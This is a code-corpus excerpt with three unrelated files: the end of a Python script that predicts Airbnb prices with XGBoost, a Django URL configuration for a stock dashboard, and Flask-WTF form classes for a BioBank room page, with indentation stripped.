# Data clearing process
rule_list = ["exclude", "convert", "lengthen"]
for rule in rule_list:
var_list = list_generator(keyword="var_" + rule)
data = rule_func(var_list=var_list, dataset=data, rule=rule)
# Only include apartments and exclude Shared rooms for simplicity
data = (
data.loc[
(data["room_type"] != "Shared room")
& (data["property_type"] == "Apartment"),
]
.copy()
.reset_index()
)
# Calculate the location score of each house
data = score_func(house_data=data, venue_data=venue_data)
# Preparing data for modelling
data = dummy_func(
data=data, column_list=["room_type", "bed_type", "cancellation_policy"]
)
g_data = dummy_func(
data=g_data, column_list=["room_type", "bed_type", "cancellation_policy"]
)
# Drop remaining unnecessary columns in case of differences in airbnb datasets
col_list = list(g_data.columns)
col_list.append("price")
data = data.filter(col_list, axis=1)
nan_fill_list = [
"host_is_superhost",
"host_listings_count",
"host_has_profile_pic",
"host_identity_verified",
"location_score",
]
for item in nan_fill_list:
data[item] = data[item].fillna(0)
currency_list = ["price", "security_deposit", "cleaning_fee", "extra_people"]
for item in currency_list:
data[item] = data[item].fillna("$0.00")
data[item] = data[item].str.replace(",", "").str.extract(r"(\d+)").astype(int)
return data, g_data
def prediction_func(data, g_data, grid_search, param_list):
"""Function for using dataset to train a model and
predicting prices for a generated data.
Parameter search is done using RandomizedSearchCV since it is computationally
more efficientcompared to GridSearchCV.
In param_list, learning_rate, subsample and max_depth,
min_child_weight, gamma and colsample_bytree can be included.
Args:
| data (pd.Dataframe): the dataset including house features and prices
| g_data (pd.Dataframe): randomly generated house features for prediction purposes
| grid_search (bool): indicates whether model is trained with parameter
search(True) or use default values(False)
| param_list (list): the list of parameters to be included in parameter search
Returns:
the predicted prices for houses in g_data (np.array)
"""
# Base Model
xgb_reg = xgb.XGBRegressor(n_treads=-1)
if grid_search:
# Search for best parameters in model
params = {
"learning_rate": [i / 20 for i in range(1, 11)],
"min_child_weight": [i for i in range(3, 12)],
"gamma": [i / 10.0 for i in range(3, 8)],
"subsample": [i / 10.0 for i in range(7, 11)],
"colsample_bytree": [i / 10.0 for i in range(6, 11)],
"max_depth": [i for i in range(3, 8)],
}
# Only includes selected parameters
params = {key: params[key] for key in param_list}
xgb_reg = RandomizedSearchCV(
estimator=xgb_reg,
param_distributions=params,
n_iter=5,
cv=3,
random_state=23,
iid=False,
)
xgb_reg.fit(data.drop("price", axis=1), data.price)
return xgb_reg.predict(g_data)
if __name__ == "__main__":
# Load data
with open(ppj("OUT_DATA", "reduced_check_in_dataset.csv"), "rb") as c:
reduced_venue = pd.read_csv(c)
with open(ppj("OUT_DATA", "generated_house_data.csv"), "rb") as g:
generated_data = pd.read_csv(g)
date = sys.argv[1]
data, generated_data = data_management(
date=date, venue_data=reduced_venue, g_data=generated_data
)
prediction = prediction_func(
data=data,
g_data=generated_data,
grid_search=True,
param_list=["learning_rate", "subsample", "max_depth"],
)
predicted_df = pd.DataFrame(prediction, columns=[date])
# Out data
with open(ppj("OUT_PREDICTION", f"{date}_prediction.csv"), "w") as p:
predicted_df.to_csv(p, index=False)
| 3.328125 | 3 |
Django/StockDash/Stock/urls.py | gankersky/Stock | 0 | 12795749 | from django.urls import path, re_path
from . import views
# This is the concrete URL configuration for the Book app; a request only reaches this app's views
# through here. The project-level BookManager urls are matched first: if 'admin' does not match,
# matching falls through to the app's Book.urls, and only then do requests reach the URLs defined here.
urlpatterns = [
    # matches http://127.0.0.1:8000/admin/
    # Regex matching: the request path is matched against a regular expression; if the path contains
    # 'admin', the admin site's URLs are included into this project and the next level of the path
    # decides how matching continues
    # If the match succeeds, the specified view is called directly
    # Regex matching: if the path does not contain 'admin', the Book app's URL configuration is
    # included into this project and the next level of the path decides how matching continues
path('stockplot/', views.showlinediagram),
path('index3', views.index3,name='index3'),
path('json1', views.json1),
# ex:/assetinfo/json2
path('json2', views.json2),
path('ajax_add/', views.ajax_add),
path('ajax_demo1/', views.ajax_demo1),
path('data_fresh/', views.data_fresh, name="data_fresh"),
    path('stocklist/', views.stockList),  # ^ marks the start and $ the end; since it is a regular expression the match must be strict
    re_path(r'^([1-9]\d*)/$', views.dashBoard_m)  # parameters are passed to the view via regex groups: wrap the pattern in parentheses and the captured values are passed in positional order
    # The path part here matters most; it represents the remainder of the requested URL
] | 2.203125 | 2 |
app/room/forms.py | kid-kodi/BioBank | 0 | 12795750 | <filename>app/room/forms.py
from flask import request
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, TextAreaField, SelectField
from wtforms.validators import ValidationError, DataRequired, Length
from flask_babel import _, lazy_gettext as _l
from app.models import Room
class SearchForm(FlaskForm):
name = StringField(_l('Nom de la salle'))
submit = SubmitField('Rechercher')
class RoomForm(FlaskForm):
name = StringField(_l('Nom de la salle'), validators=[DataRequired()])
submit = SubmitField(_l('Enregistrer'))
| 2.40625 | 2 |